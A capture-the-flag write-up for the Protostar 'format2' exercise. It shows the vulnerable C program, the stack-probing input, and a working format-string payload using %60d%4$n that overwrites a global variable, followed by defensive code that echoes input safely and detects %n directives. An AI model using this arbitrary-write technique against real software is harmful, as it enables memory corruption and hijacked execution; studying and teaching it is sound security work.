Protostar VM, format2

Here is the source of the vulnerable program:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
    char buffer[512];

    fgets(buffer, sizeof(buffer), stdin);
    /* the bug: user input is used as the format string itself */
    printf(buffer);

    if(target == 64) {
        printf("you have modified the target :)\n");
    } else {
        printf("target is %d :(\n", target);
    }
}

int main(int argc, char **argv)
{
    vuln();
}

This challenge is a slight variation of the previous one.
On top of writing to a specific address, this time we’ll have to write a specific number: 64.

Like the previous challenge, let’s find target’s address and where the string is written on the stack by printf.

user@protostar:~$ /opt/protostar/bin/./format2
ABABABAB%x.%x.%X.%X.%X.%X.%X.%X.%X.%X
ABABABAB200.�b7fd8420.BFFFF604.42414241.42414241.C32E7825.252E7825.58252E58.2E58252E.252E5825
target is 0 :(
user@protostar:~$ objdump -t /opt/protostar/bin/format2 | grep target
080496e4 g O .bss 00000004 target
user@protostar:~$

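We have to write to 080496e4, and our string shows up as the 4th argument on the stack (the first 42414241 in the output above). Now how can we write exactly 64? We can use the same trick as in format0 and pad the output with a minimum field width: %n stores the number of characters printed so far, so the 4 address bytes plus a value padded to 60 characters give 64.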

user@protostar:~$ python -c 'print "\xe4\x96\x04\x08"+"%60d"+"%4$n"' > payload 
user@protostar:~$ cat payload - | /opt/protostar/bin/./format2
�� 512
you have modified the target :)

user@protostar:~$

There you go.
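
The fix side of this challenge, as an added example (not part of the original write-up or the Protostar source): a hardened echo that passes input as data to a constant format, the 4 + 60 = 64 count that %n stores reproduced safely with a local int, and a small check for %n directives in untrusted input. The function names and the sample string are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hardened form of vuln()'s printf(buffer): input is an argument to a
 * constant format, so directives inside it are printed, not interpreted. */
int echo_safe(char *out, size_t outsz, const char *input)
{
    return snprintf(out, outsz, "%s", input);
}

/* Value %n stores = characters emitted before it. Constant format, local
 * int as destination; prefix_len models the 4 address bytes, width the %60d. */
int count_seen_by_n(int prefix_len, int width)
{
    char out[1024];
    int stored = -1;
    snprintf(out, sizeof out, "%*s%*d%n", prefix_len, "", width, 512, &stored);
    return stored;
}

/* Review/detection helper: does untrusted input contain a %n-family
 * directive (including positional forms such as %4$n and %hhn)? */
int has_n_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        s++;
        if (*s == '%') continue;                 /* literal percent */
        s += strspn(s, "0123456789$-+ #'*.");    /* position, flags, width, precision */
        s += strspn(s, "hlLqjzt");               /* length modifiers */
        if (*s == 'n') return 1;
        if (*s == '\0') break;                   /* do not step past the terminator */
    }
    return 0;
}

int main(void)
{
    char out[128];
    const char *sample = "AAAA%60d%4$n";         /* constructed sample input */
    int n = echo_safe(out, sizeof out, sample);
    printf("echoed %d chars verbatim: %s\n", n, out);
    printf("%%n would store %d\n", count_seen_by_n(4, 60));
    printf("has %%n directive: %d\n", has_n_directive(sample));
    return 0;
}
```

Compiling the original program with -Wformat-security (or -Wformat=2) makes gcc flag the printf(buffer) call, which is the quickest way to find this pattern in a code base.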